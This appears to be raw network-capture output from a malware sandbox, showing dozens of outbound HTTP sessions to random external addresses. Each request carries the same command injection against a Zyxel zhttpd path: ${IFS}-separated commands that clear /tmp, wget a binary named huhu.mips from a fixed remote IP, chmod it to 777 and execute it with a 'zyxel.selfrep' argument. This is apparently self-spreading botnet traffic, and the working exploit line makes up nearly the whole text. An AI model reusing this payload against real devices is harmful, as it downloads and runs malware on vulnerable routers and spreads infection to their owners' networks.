                                                        Feb 2, 2024 06:21:08.903515100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4106192.168.2.1455540184.120.219.200443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.903568983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4107192.168.2.143913839.68.172.85443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.903621912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4108192.168.2.144501490.199.108.25443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.903664112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4109192.168.2.1456364170.82.24.248443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.903700113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4110192.168.2.1434146153.203.197.139443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.903738976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4111192.168.2.145191650.195.159.234443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.903809071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4112192.168.2.1438644108.75.72.116443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.903856993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4113192.168.2.144610276.159.230.192443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.903903961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4114192.168.2.145068899.44.251.178443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.903939962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4115192.168.2.1435944146.81.17.32443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.903989077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4116192.168.2.1443744180.208.9.125443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.904023886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4117192.168.2.1443044161.138.28.18443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.904084921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4118192.168.2.1433858160.162.32.119443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.904119015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4119192.168.2.1457920167.128.15.177443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.904160976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4120192.168.2.1444722211.240.178.82443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.904195070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4121192.168.2.1443552128.72.251.134443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.904233932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4122192.168.2.1454706113.154.242.211443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.904278994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4123192.168.2.1459146109.246.188.198443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.904304981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4124192.168.2.143740477.216.69.188443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.904354095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4125192.168.2.144935285.139.110.56443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.904376984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4126192.168.2.145462220.209.73.217443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.904438019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4127192.168.2.144566844.38.195.23443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.904479980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4128192.168.2.145217838.67.100.4443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.904515028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4129192.168.2.1437248182.195.55.214443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.904556036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4130192.168.2.1436722176.36.112.126443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.904582977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4131192.168.2.1450990218.59.170.200443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.904642105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4132192.168.2.145614075.27.129.123443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.904680014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4133192.168.2.1437392177.135.30.68443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.904709101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4134192.168.2.14354709.10.161.55443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.904752016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4135192.168.2.1439076174.244.246.143443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.904807091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4136192.168.2.144080898.142.130.186443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.904850006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4137192.168.2.145116676.150.214.83443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.904895067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4138192.168.2.1455788116.203.137.87443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.904927015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4139192.168.2.1452394209.164.97.243443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.904957056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4140192.168.2.1456504124.186.5.2443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.905004978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4141192.168.2.1456416195.23.30.82443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.905056953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4142192.168.2.1434956107.213.238.246443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.905083895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4143192.168.2.143363874.60.163.180443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.905112028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4144192.168.2.1452732155.73.165.212443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.905157089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4145192.168.2.145798687.91.21.39443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.905205011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4146192.168.2.1442002111.59.133.229443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.905246973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4147192.168.2.1446468174.160.107.126443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.905286074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4148192.168.2.1454388102.11.22.239443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.905337095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4149192.168.2.144285674.251.159.185443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.905370951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4150192.168.2.1447504175.130.147.159443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.905415058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4151192.168.2.1455604103.25.109.20443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.905438900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4152192.168.2.144948632.119.157.91443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.905483961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4153192.168.2.1434120219.227.116.105443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.905533075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4154192.168.2.1459060193.221.128.94443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.905582905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4155192.168.2.14353062.24.99.242443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.905616999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4156192.168.2.1453340140.163.55.181443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.905647039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4157192.168.2.1443884223.153.90.163443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.905704021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4158192.168.2.1453272135.231.39.106443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.905755043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4159192.168.2.1455804191.133.13.150443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.905786991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4160192.168.2.1451838196.138.240.91443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.905857086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4161192.168.2.1445106178.123.232.135443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.905903101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4162192.168.2.1459602173.159.39.38443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.905939102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4163192.168.2.1442720169.89.43.58443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.905975103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4164192.168.2.1445238166.94.107.32443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.906034946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4165192.168.2.1458940110.158.153.190443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.906065941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4166192.168.2.1440938150.116.154.108443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.906130075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4167192.168.2.143561473.106.42.87443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:08.906163931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4168192.168.2.1456630198.142.195.92443
                                                        TimestampBytes transferredDirectionData
